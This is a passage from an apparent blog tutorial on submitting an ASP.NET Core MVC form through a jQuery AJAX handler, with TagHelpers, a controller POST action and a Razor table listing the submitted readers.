btn-primary" type="submit">Submit</button> </form> </div> Observe that we used asp-* tags to specify the action and for scaffolding the model attributes which are to be passed onto the specified endpoints. These are called as taghelpers which come along with the aspnetcore MVC template and which help in making things easier for us while POSTing data to the controller from the form. In general scenarios, to POST form to a controller using a model we would need to ensure that the property names in the model match with the "name" and "id" properties of the HTML fields, otherwise these values shall not be captured and assigned to the model object. Tag Helpers solve this problem by creating a scaffold between the HTML inputs we use and the intended Model property to be binded. And they take care of the assignment part themselves. <input asp- actually translates to, <input class="form-control" type="text" data- Where the maxlength, required attributes are dynamically scaffolded based on how we have defined the property Name inside our Model. [Required] [StringLength(200)] public string Name { get; set; } Same is the case with the asp-controller and asp-action taghelpers, together they form the "action" HTML attribute of the form tag. This ensures that the correct action is attached to the form, no matter what route the controller or the action is actually mapped to. Let's add the necessary jQuery logic to post this form. Now this is done in two ways: In our case, we shall override the generic submit behavior with our own event handler that is triggered when the form is submitted. Why to override the default Submit? Let's say we don't write any frontend handler ourselves and click on submit, still the data is submitted to the controller with the model data, but we can't add any customization to this (for example adding spinners, loading popups for failure handling and such) because the default jQuery files which come bundled within the MVC template handle this HTTP request for us and they can't be changed. For this, we override the behavior by adding our own jQuery submit event handler and then POSTing the form ourselves. This is done as below: $(document).ready(function () { $("form") .submit(function (event) { debugger; event.preventDefault(); // fetch the form object $f = $(event.currentTarget); // check if form is valid if ($f.valid()) { $("div.loader").show(); // fetch the action and method var url = $f.attr("action"); var method = $f.attr("method"); if (method.toUpperCase() === "POST") { // prepare the FORM data to POST var data = new FormData(this); // ajax POST $.ajax({ url: url, method: "POST", data: data, processData: false, contentType: false, success: handleResponse, error: handleError, complete: function (jqXHR, status) { console.log(jqXHR); console.log(status); $f.trigger('reset'); } }); } } }); function handleResponse(res) { debugger; $("div.loader").hide(); // check if isSuccess from Response // is False or Not set if (!res.isSuccess) { debugger; // handle unsuccessful scenario } else { debugger; // handle successful scenario showSuccessMessage(); } } function handleError(err) { $("div.loader").hide(); if (xhr.responseText) showErrorMessage(xhr.responseText); else showErrorMessage("Error has occured. Please try again later."); } function showErrorMessage(message) { debugger; // show a popup logic or an alert logic var popup = $('#errorAlert'); popup.removeClass('d-none'); setTimeout(() => { popup.addClass('d-none'); }, 5000); } function showSuccessMessage(message) { debugger; // show a popup logic or an alert logic var popup = $('#successAlert'); popup.text(message); popup.removeClass('d-none'); setTimeout(() => { popup.addClass('d-none'); }, 5000); } }); Here we use the "submit" event handler on the "form" element and do the needful ourselves, in addition we can add customization like adding a spinner (<div.loader> tag) for all the time the form is being processed, or handle the success or failure cases better. In any case, this provides us with better control over the form than not using this. This entire logic resides under site.js under the wwwroot folder for better caching and bundling. And finally the controller logic is as below: namespace ReadersMvcApp.Controllers { public class ReadersController : Controller { private readonly IReaderRepo _repo; private readonly IHostEnvironment _env; // default constructor // where any instance level // assignments happen public ReadersController(IReaderRepo repo, IHostEnvironment environment) { _repo = repo; _env = environment; } // The Grid View of // all the Readers in the Store public IActionResult Index() { return View(_repo.Readers); } // default GET Endpoint which // renders the View for us // from ~/Views/Readers/New.cshtml public IActionResult New() { return View(); } // default POST Endpoint which // receives data from the Form submit // at ~/Views/Readers/New.cshtml // and returns the response to // the same View [HttpPost] public async _Task<IActionResult>_ New([FromBody]ReaderModel model) { var res = new ReaderResponseModel(); // magic happens here // check if model is not empty if (model != null) { // create new entity var reader = new Reader(); // add non-file attributes reader.Name = model.Name; reader.EmailAddress = model.EmailAddress; // add the created entity to the datastore // using a Repository class IReadersRepository // which is registered as a Scoped Service // in Startup.cs var created = _repo.AddReader(reader); // Set the Success flag and generated details // to show in the View res.IsSuccess = true; res.ReaderId = created.Id.ToString(); } // return the model back to view // with added changes and flags return Json(res); } } } Observe that we use [FromBody] attribute for the model to be captured, since we are using $.ajax which pushes data inthe form of content "application/json" we would require this attribute to state that the request content is coming in the body section, to be processed by the controller. And once the model is received, the magic happens within the controller. otherwise, the controller expects the data be sent in the default contentType of the form (form-url-encoded) and so the data passed from jQuery is not received resulting in a 415 - ContentType not Supported response. Finally the Index page contains all the Readers submitted in the store along with their details, bound in a GridView which is as follows: @model IEnumerable<ReaderStore.WebApp.Models.Entities.Reader> <table class="table"> <tr> <th>Id</th> <th>Name</th> <th>EmailAddress</th> <th>Work</th> <th>Added On</th> </tr> @foreach (var r in Model) { <tr> <td> <a href="@Url.Action("Index", "Readers", new { id = r.Id })"> @r.Id</a> </td> <td>@r.Name</td> <td>@r.EmailAddress</td> <td>@r.AddedOn</td> </tr> } </table> In this way, we can implement a simple POST form and submit it to an ASP.NET Core MVC Controller using jQuery and TagHelpers complemented by the BootStrap form classes. asp.net core jquery asp.net core jquery ajax post asp.net core jquery ajax asp.net core and jquery ajax call jquery asp.net core asp.net core jquery form submit call asp.net core web api from jquery jquery for asp.net core asp.net core how to add jquery dotnet core jquery jquery ajax post dotnet core dotnet core mvc jquery asp.net core use jquery Subscribe to my newsletter and get the first copy of every new post delivered straight into your inbox.
https://referbruv.com/blog/posts/posting-an-aspnet-core-mvc-form-using-jquery-bootstrap-and-taghelpers
CC-MAIN-2020-34
refinedweb
1,442
54.42
In this problem, we will find the unconstrained portfolio allocation where we introduce the weighting parameter $\lambda(0 \leq \lambda \leq$ 1)and minimize the $\lambda * risk - (1-\lambda)* return$. By varying the values of $\lambda$, we trace out the efficient frontier. Suppose that we know the mean returns $R \in \mathbf{R}^n$ of each asset and the covariance $Q \in \mathbf{R}^{n \times n}$ between the assets. Our objective is to find a portfolio allocation that minimizes the risk (which we measure as the variance $w^T Q w$) and maximizes the return ($w^T R$) of the portfolio of the simulataneously. We suppose further that our portfolio allocation must comply with some lower and upper bounds on the allocation, $w_\mbox{lower} \leq w \leq w_\mbox{upper}$ and also $w \in \mathbf{R}^n$ $\sum_i w_i = 1$. This problem can be written as\begin{array}{ll} \mbox{minimize} & \lambda*w^T Q w - (1-\lambda)*w^T R \\ \mbox{subject to} & \sum_i w_i = 1 \\ & w_\mbox{lower} \leq w \leq w_\mbox{upper} \end{array} where $w \in \mathbf{R}^n$ is the vector containing weights allocated to each asset in the efficient frontier. We can solve this problem as follows. using Convex, ECOS #We are using ECOS solver. Install using Pkg.add("ECOS") # generate problem data srand(0); #Set the seed n = 5; # Assume that we have portfolio of 5 assets. R = 5 * randn(n); A = randn(n, 5); Q = A * A' + diagm(rand(n)); w_lower = 0; w_upper = 1; risk = zeros(2000); # Initialized the risk and the return vectors. ret = zeros(2000); # lambda varies in the interval(0,1) in the steps of 1/2000. w = Variable(length(R)); #Defining constraints c1 = sum(w) == 1; c2 = w_lower <= w; c3 = w <= w_upper; for i in 1:2000 λ = i/2000; #Defining Objective function objective = λ * quadform(w,Q) - (1-λ)* w' *R; p = minimize(objective, c1,c2,c3); solve!(p, ECOSSolver(verbose = false)); risk[i] = (w.value' * Q * w.value)[1]; ret[i] = (w.value'R)[1]; #println("$i ","$(λ*risk[i] - (1-λ)*ret[i]) ","$p.optval"); end using PyPlot #Install PyPlot if you don't have it installed. Pkg.add("PyPlot") plot(risk,ret) title("Markowitz Efficient Frontier"); xlabel("Expected Risk-Variance"); ylabel("Expected Return");
https://nbviewer.jupyter.org/github/JuliaOpt/Convex.jl/blob/master/examples/portfolio_optimization3_unconstrained_markowitz_efficient_frontier.ipynb
CC-MAIN-2019-18
refinedweb
382
55.44
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3 Build Identifier: Rhino CVS It seems as if classes with either setFoo or getFoo but not both will not create beans. I ran into this problem when working with HttpServletResponse: It has a setStatus() method but no getStatus() method, so I cannot write response.status = response.SC_OK without getting an exception: org.mozilla.javascript.EvaluatorException: Java class "javax.servlet.http.HttpServletResponse" has no public instance field or method named "status". If I write response.setStatus(response.SC_OK) it works fine. Further testing revealed that this seems to be a bug in the JavaMembers.reflect() if either a get or set method is missing for a particular property. I propose that if only a get method is visible, the property is defined as readonly and if only a set method is visible, the property should at least have a setter method. Reproducible: Always Steps to Reproduce: 1. Add the following Java class to your java classpath: public class Foo { public Foo() { } public void setA(Object o) { System.out.println("setA "+o); } public Object getA() { System.out.println("getA "); return null; } public void setB(Object o) { System.out.println("setB "+o); } public Object getC(Object o) { System.out.println("getC "); return null; } } 2. Write a javascript that tests this: var foo = new Packages.Foo(); var Rhino = { log: function (msg) { print("Rhino.log : "+msg+"\n"); }}; try { foo.a = 1; } catch (ex) { Rhino.log(ex) } try { foo.b = 2; } catch (ex) { Rhino.log(ex) } try { foo.c = 3; } catch (ex) { Rhino.log(ex) } try { Rhino.log('a: '+foo.a); } catch (ex) { Rhino.log(ex) } try { Rhino.log('b: '+foo.b); } catch (ex) { Rhino.log(ex) } try { Rhino.log('c: '+foo.c); } catch (ex) { Rhino.log(ex) } 3. Run it Actual Results: setA 1.0 Rhino.log: InternalError: Java class "Foo" has no public instance field or method named "b". Rhino.log: InternalError: Java class "Foo" has no public instance field or method named "c". getA Rhino.log: a: null Rhino.log: b: undefined Rhino.log: c: undefined Expected Results: the foo.b = 2 line should not get an error, and the Rhino.log('c:' +foo.c) line should print null instead of undefined. Created attachment 228553 [details] Java class demonstrating problem Created attachment 228556 [details] [diff] [review] Potential fix? I had made a mistake in my earlier post, if there is a get function and no set function, it did function correctly (I simply had written my get function in Foo.java incorrectly!). However, the original problem (a set method but no get method) still applies. This patch fixes the problem for me. Reviewed and committed the fix - will be in 1.6R3 (In reply to comment #3) > Reviewed and committed the fix - will be in 1.6R3 > Now I'm experiencing a similar problem on 1.6R3! Now, when you have both the setter and the getter, the property is not added to the members. Stepping through the reflect() method, it seems that when the iteration encounters a getter, it registers the property with the "toAdd" map, but then, when it encounters the setter, it overrides it with a BeanProperty that holds a null getter. Created attachment 233039 [details] [diff] [review] Patch to fix the bean property regression This patch should fix the problem in JavaMembers that results in some bean properties not being exposed properly in NativeJavaObjects. Ok, I commited your fix to CVS HEAD - actually refactored it a bit, as there was some code duplication in there (for looking up both getXxx and isXxx), other than that I didn't change it. Thank you again, and give it a try sometime.
https://bugzilla.mozilla.org/show_bug.cgi?id=343976
CC-MAIN-2017-26
refinedweb
622
61.12
There seems to be lots of new checking going on in newest GWT Shell runtime environment. I haven't seen this earlier but now if you use the BaseTreeModel class without a type specifier, the GWT shell will throw a lot of warning messages at you, and RPC can stop working all together I noticed. The source is the generic list children on the BaseTreeModel class. GWT informs that it won't be able to optimize your compiled collection unless its type is given, which is good. The BaseTreeModel class unfortunately requires that its children also extends BaseTreeModel. E.g. if you have public class Department extends BaseTreeModel<Employee> public class Employee extends BaseTreeModel you will get lots of warnings. But if you do this instead public class Employee extends BaseTreeModel<BaseTreeModel> .. it works. Looks a bit awkward but ... Based on this I propose an addendum to the JavaDoc for the BaseTreeModel class along these lines. Note: If you are sending BaseModelTree instances over RPC the class representing the lowest level of your BaseModelTree hiearchy must specify itself or the BaseTreeModel class as its generic type specifier. If not GWT optimizer will give warnings.
https://www.sencha.com/forum/showthread.php?37812-GWT-shell-barks-at-non-generic-BaseTreeModel-classes
CC-MAIN-2016-44
refinedweb
194
62.48
F# introduces a code structure called pattern matching which allows you to perform some pretty interesting tasks in the language. This article will get you up to speed with this powerful technique in programming. Introduction Pattern matching in F# is similar to using a switch statement in C#, but has a lot more flexibility. You still need to be type safe, as you do in C#, but you really have a lot of flexibility in each "case" of the pattern. The best way to understand pattern matching in F# is to take a set of examples. So let's begin. Creating an Enumeration in F# To create an enumeration in F#, you use the structure below. It seems the only restriction was in the naming in that each enumerated value needs to be capitalized otherwise the compiler complains). Listing 1 - Shape Enumeration in F# The interactive F# screen verifies that this is correct by listing the enumeration after hitting enter: Listing 2 - Output from Interactive Window of Shape Enumeration We will use this enumeration in most of our examples to illustrate the flexibility of pattern matching, and how we can give functional meaning to all of the enumerated types through pattern matching: Overview of Pattern Matching In essence, pattern matching matches a value against a set of values or patterns of the same type. Upon getting a correct match to the pattern, we can act upon it by executing a function, returning a value, or failing with an exception. Our first example is pretty straightforward. We want to create a function called numberOfSides that takes a shape and matches it against all of the possible shapes. Upon matching the correct shape, the function will return an integer representing the number of sides of the shape. Listing 3 - Number of Sides Patttern Matching function in F# We could imagine a similar switch statement in C# as shown below. Note how much less work it is to write the same exact code in F#. Also note that you do not require a default statement in F#, but if you don't include every possible case inside your enumeration, the statement will throw a compile error. Listing 4 - Number of Sides Equivalent Switch Statement in C# case Square: return 4; break; case EquilateralTriangle: return 3; break; case Triangle: return 3; break; case Rectangle: return 4; break; case Pentagon: return 5; break; default: return 0;} When we run the F# code in Listing 3 on a Triangle, it does in fact return the value 3 as shown in the results below: Listing 5 - Calling the numberOfSides function in F# val it : int = 3 As long as you match against the correct type, you can return just about anything. In the sample in listing 6 we create the shapeColor function which returns a color associated with each shape. In this example we introduced a new pattern to match against, the underscore (_). The underscore is like the default in a switch statement, but it basically says: "Match against anything else". Our F# code will assign the color black to all other shapes that are not Circle, Square, or Triangle: Listing 6 - Assigning Colors to Shapes through pattern matching in F# The results of calling the shapeColor on the Circle is shown in listing 7 and does indeed return red. Listing 7 - Calling the shapeColor method on a Circle in F# If we try one of the other shapes not included in the pattern list we get a string of "black" returned: Listing 8 - Calling the shapeColor method on a Shape for the default case For people doing graphics code in F#, it might be fairly useless returning a color represented by a string. Why not return a real-live .NET Color? Any .NET class can be used in F# simply by calling open on the namespace you wish to use. In the F# pattern matching code shown in listing 9, we return a System.Drawing color for each shape in our enumeration. Listing 9 - Pattern matching a shape to a .NET Color object The results of calling shapeColor on a Circle gives us the Color object represented in F# (which looks a little different than it's C# counterpart, but it's just as complete): Listing 10 - Results of calling the alternate shapeColor function on a Circle Using Functions in Pattern Matching The power of F# is that it is a functional language and functions can be stuck all over the place in your code. You can do the same in C#, but the amount of typing in F# is a lot less. (reminds me a little bit of my C coding days). Some might argue that the "short-cut feel" of F# is dangerous, poor design, hard to follow, and a few additional expletives, but the truth is that F# is a type-safe object-oriented language(yup, it has classes and interfaces). It's up to the user to write his or her F# code so people can actually read it. Anyway, let's see how we can react to our patterns differently, but adding functions inside. In the sample in listing 11, we want to associate an area calculation with each shape. The pattern matching statement looks almost exactly the same, only in this case we have passed an additional parameter, side into our shapeArea function. We can actually use the parameter inside each of our pattern matching statements to perform the area calculation. Listing 11 - pattern matching shapes to functions to compute their area let shapeArea(aShape:shape, side) = match (aShape) with| Circle -> Math.PI * side * side | Square -> side * side| EquilateralTriangle -> side * side * Math.Sqrt(3.0)/4.0| _ -> side * side;; One might argue, that what I just did was completely not object-oriented. In an object-oriented world, You would probably create a base class called Shape and several subclasses called Circle, Square, Triangle, EquilateralTriangle, etc. You would then create a virtual function CalculateArea and override this function in each of your shape classes. Or, alternatively, you might create an Interface IShape, and implement the CalculateArea function in all the different shapes (Circle, Square, Triangle, etc.). Note that you could do this in F# the way I just described, but one might also argue that the functional model here is faster, maintainable, and type-safe, and a lot less code. However, (and this is a big however), the code above is a completely different design paradigm, and should be approached differently. My gut feel is that code for large projects should be a mixture of C# or more object-oriented F# and include the rapidly-coded functional F#. But the functional F# should be wrapped very understandably in an API of some sort to black-box some of the uglier functional code that could arise from this type of coding. Also, it's always a judgment call as to when you are writing functions that can be used by classes at a higher level, or when you are writing functions that step all over your software architecture. Listing 12 shows the results of our area calculation for a side(or radius) of 5 for a few different shapes: Listing 12 - Results of calling the shapeArea pattern matching function on different shapes >shapeArea (EquilateralTriangle, 5.0);;val it : float = 10.82531755 > shapeArea (Square, 5.0);;val it : float = 25.0 (Square, 5.0) |> shapeArea;; Notice that our default pattern just computes the area as side * side, but this is in fact incorrect. For a triangle with different length sides, we cannot compute the area by just knowing one side of the shape. The same is true for a rectangle. There is no way of knowing the area from one side of the rectangle. In order to correct the potential error, we can insert a different function in our default case called failwith. This will force the code to throw an exception for all shapes that don't have enough information to do the area calculation. Listing 13 - Adding default behavior to the shapArea function Using Pattern matching like a set of "if statements" Because pattern matching in F# can return any type, you can also return a boolean type. In listing 14 we create a function called hasFourSides that returns true if the shape has four sides. Since only rectangles and squares have four sides, we return true for these shapes, and false for everything else. Listing 14 - Boolean pattern matching function hasFourSides The results of running the hasFourSides function on a Circle and a Square is shown in the results below: Listing 14 - Results of calling the pattern matching function hasFourSides hasFourSides Square;; Type Safety in Pattern Matching If we try to run the hasFourSides function on something that is not a shape, we will get an exception. In the first case shown in listing 15, we just invent some object name, and the compiler tells us googoo has no constructor. Listing 15 - Results of calling the pattern matching function hasFourSides on an undefined type If we try to run hasFourSides on a known type (such as an integer) that is not a shape, we get a type exception as shown in listing 16: Listing 16 - Results of calling the pattern matching function hasFourSides on a type that is not a shape hasFourSides 5;;-------------^^stdin(230,13): error: FS0001: This expression has typeint but is here used with type shape stopped due to error Using Conditions in a Pattern Here is where F# pattern matching shows a bit more of it's muscle than a C# switch statement. You can use a when clause in your pattern which will match against a particular condition for the type you are matching against. In our example in listing 17, we want to find all shapes with less than four sides. We could list those shapes explicitly, but it is faster to use the numberOfSides function that we have already created and compare the result to see if it is less than 4 in a when clause. If it is less than 4, we can return true, otherwise we return false. Listing 17 - Adding a condition to a pattern that checks for shapes with sides less than 4 // Results of testing a triangle and a square > Note that we need to specifiy a variable in our when clause called x. I'm not exactly sure what one needs the x variable name, but F# requires it. If we look at the code produced by F# using Reflector (listing 18), we see that x doesn't really do anything other than hold the shape parameter. It is unnecessary in the actual code here. I suppose if you needed to use x inside of a method belonging to your pattern, it could prove useful. Listing 18 - Results of viewing the F# hasFourSides function in Reflector public static bool lessThanFourSides(shape aShape) { Test.shape shape = aShape; Test.shape x = shape; if (numberOfSides(aShape) < 4) { Test.shape x = shape; return true; } return false; } Patterns in Lists Another powerful pattern matching feature is matching patterns in lists. You can perform different actions on a list, based on what particular pattern you are looking for in the list. FSharp has it's own list collections, and our example in listing 19 shows how to match against the List collection. In the code, we created a simple list that has the numbers 1,2,3,4,5 and we are looking to see if the list starts with 1. If it matches the pattern 1::_, then it starts with 1. The :: operator is called the Cons operator which I think this is short for consecutive, but I'm not sure. (At least I'm sure it's not short for Constant). This operator is used to match the pattern of items adjacent to each other in the list. Listing 19 - Matching the first number in a list to 1 You can also manipulate lists, by replacing the underscore (_) with a variable. For example if we wanted to print out all the numbers in the list after 1, we could provide the following pattern matching statements shown in listing 20: Listing 20 - Retrieving parts of a pattern in a List Listing 20 produces the result [2; 3; 4; 5] for the variable x for the parent list [1;2;3;4;5]. [1;2;3;4;5] matches the pattern 1:x, and x = [2;3;4;5] in this case. A pattern matching statement returns a copy of the list it is operating on. As a result, you can do some pretty funky things with pattern matching, recursion and lists. Say we have a list of floats [1.0; 2.0; 3.0; 4.0; 5.0] and we want to produce a list that is exactly half of every number in the list. We can write a pattern matching statement like the one in listing 21. This recursive function HalveList goes through each head element and divides it by two. It then calls HalveList on the remaining tail elements. It will continue to do the recursive call until the tail list is empty, matching the pattern []. The resulting output to the console is [0.5; 1.0; 1.5; 2.0; 2.5]. Listing 21 - Halving all the Elements in a List let rec HalveList aList = match aList with | head::tail -> head/2.0 :: HalveList(tail) | [] -> [];; let print_any (listHalved);; What if we wanted to take the product of all elements in the list? We could do something very similar. If the pattern matches the head element followed by all the consecutive elements, we can multiply the head element by the product of all the rest of the tail elements recursively. When the tail list is empty, we simply multiply by one. The result for a list [1.0; 2.0; 3.0; 4.0; 5.0] is 120.0. Listing 22 - Getting the Product of the Elements in a List print_any (product);; Let's say we only wanted the product of the even numbers in the list? We can use a condition on the head of the list to make sure it is an even number(the condition being (int)head % 2 = 0). Remember that like switch statements, we need to handle all the cases for a pattern match statement. Therefore, we also need to handle the odd number cases by re-calling the recursive function without calculating a product. This is handled by the following pattern | head::tail -> CalcProductList(tail). We also still need to handle the empty list condition for when the tail list is empty. This is handled with the | [] -> 1.0 pattern which multiplies our product by one and doesn't affect the result. Listing 23 - Getting the Product of the Even Elements in a List Extracting a list of fields from a list of records One more thing I found useful with pattern matching of lists is to extract a list of field values from within a list of F# records. Let's say we have a list of customers and we want to extract all the phone numbers of those customers from the list. We can use pattern matching to get the desired list of phone numbers. We just recursively append the phone value of the customer (the head value) to a new list of phone numbers using pattern matching. Listing 24 - Extracting a list of phone numbers from a list of Customer objects // List of Customers // print out the list of phone numbers Now let's just filter the list and get a list of phone numbers with New York Area Codes. Here we recursively append numbers that start with 212 using the when clause. Again we need to handle all possible cases, so cases where the number does not start with 212, we call NewYorkNumbers recursively with the tail. Listing 25 - Extracting a list of NY phone numbers from a list of Customer objects // print out the list of NY phone numbersprint_any Note that a lot of what I've shown here can be done a lot easier using LINQ, but the code samples do illustrate some of the power of pattern matching with a List collection. Conclusion Pattern matching gives you a powerful way to perform decision making based on the aspects of a particular F# type. It is in some ways similar to a C# switch statement, but gives you a lot more functionality and flexibility. Not only can you match patterns in your objects, enumerations, and lists, but you can filter on these patterns for particular conditions. As a result of your F# type matching a pattern, you can perform an action on that type. Another compelling use of pattern matching is to use patterns to match items in a list. In turn, you can use the items in one list to create a new list based on the pattern matched. You can also perform aggregate functions on the items in the list. Anyway, have fun experimenting with F# in the interactive window or in your own F# project file. I think you'll find that it may provide you with a few hours of programming F#un.
http://www.c-sharpcorner.com/UploadFile/mgold/PatternMatchingFSharp04292008183848PM/PatternMatchingFSharp.aspx
crawl-002
refinedweb
2,873
66.37